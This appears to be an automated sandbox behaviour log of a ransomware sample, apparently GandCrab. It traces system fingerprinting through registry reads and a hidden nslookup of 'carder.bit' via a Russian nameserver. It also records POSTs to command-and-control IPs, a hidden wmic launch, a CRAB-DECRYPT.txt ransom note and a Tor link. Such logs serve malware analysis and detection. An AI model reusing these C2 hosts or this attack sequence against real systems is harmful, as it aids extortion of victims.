Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 2
Fn
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = MyMainWnd, index = 18446744073709551600, new_long = 1421869056 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Thread 0xafc
2 0
Category Operation Information Success Count Logfile
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 1
Fn
Thread 0xb1c
90 35
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=e65fbbbf9c354b42 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
System Get Time type = Ticks, time = 109341 True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, type = size True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 323593, size_out = 323593 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xb44, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 308 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 193.107.99.167, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eeploreza, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 193.107.99.167/eeploreza True 1
Fn
Data
Inet Read Response size = 204798, size_out = 552 True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 125939 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 156765 True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77eeffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0x770, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read filename = C:\\CRAB-DECRYPT.txt, size = 4096, size_out = 308 True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 46.40.123.136, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = phow, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 46.40.123.136/phow True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x760edf04 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x760edf04 True 1
Fn
System Get Time type = Ticks, time = 162038 True 1
Fn
System Get Time type = Ticks, time = 162927 True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\\pidor.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\\pidor.bmp, size = 14 True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\\pidor.bmp, size = 40 True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\\pidor.bmp, size = 5184000 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = https://www.torproject.org/download/download-easy.html.en, show_window = SW_SHOW False 1
Fn
Thread 0xb20
524 0
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1638160 True 1
Fn
Driver Enumerate load_addresses = 4128768 True 1
Fn
Driver Get Name load_address = 42020864 True 1
Fn
Driver Get Name load_address = 48222208 True 1
Fn
Driver Get Name load_address = 12279808 True 1
Fn
Driver Get Name load_address = 13033472 True 1
Fn
Driver Get Name load_address = 13357056 True 1
Fn
Driver Get Name load_address = 13438976 True 1
Fn
Driver Get Name load_address = 13824000 True 1
Fn
Driver Get Name load_address = 15667200 True 1
Fn
Driver Get Name load_address = 16338944 True 1
Fn
Driver Get Name load_address = 16400384 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14716928 True 1
Fn
Driver Get Name load_address = 14757888 True 1
Fn
Driver Get Name load_address = 14966784 True 1
Fn
Driver Get Name load_address = 15020032 True 1
Fn
Driver Get Name load_address = 15106048 True 1
Fn
Driver Get Name load_address = 15192064 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 15568896 True 1
Fn
Driver Get Name load_address = 12689408 True 1
Fn
Driver Get Name load_address = 15605760 True 1
Fn
Driver Get Name load_address = 12861440 True 1
Fn
Driver Get Name load_address = 12926976 True 1
Fn
Driver Get Name load_address = 17334272 True 1
Fn
Driver Get Name load_address = 17645568 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17727488 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18112512 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21909504 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21364736 True 1
Fn
Driver Get Name load_address = 23117824 True 1
Fn
Driver Get Name load_address = 25231360 True 1
Fn
Driver Get Name load_address = 25534464 True 1
Fn
Driver Get Name load_address = 25600000 True 1
Fn
Driver Get Name load_address = 25911296 True 1
Fn
Driver Get Name load_address = 25944064 True 1
Fn
Driver Get Name load_address = 26181632 True 1
Fn
Driver Get Name load_address = 26255360 True 1
Fn
Driver Get Name load_address = 26292224 True 1
Fn
Driver Get Name load_address = 26529792 True 1
Fn
Driver Get Name load_address = 26619904 True 1
Fn
Driver Get Name load_address = 27217920 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 27045888 True 1
Fn
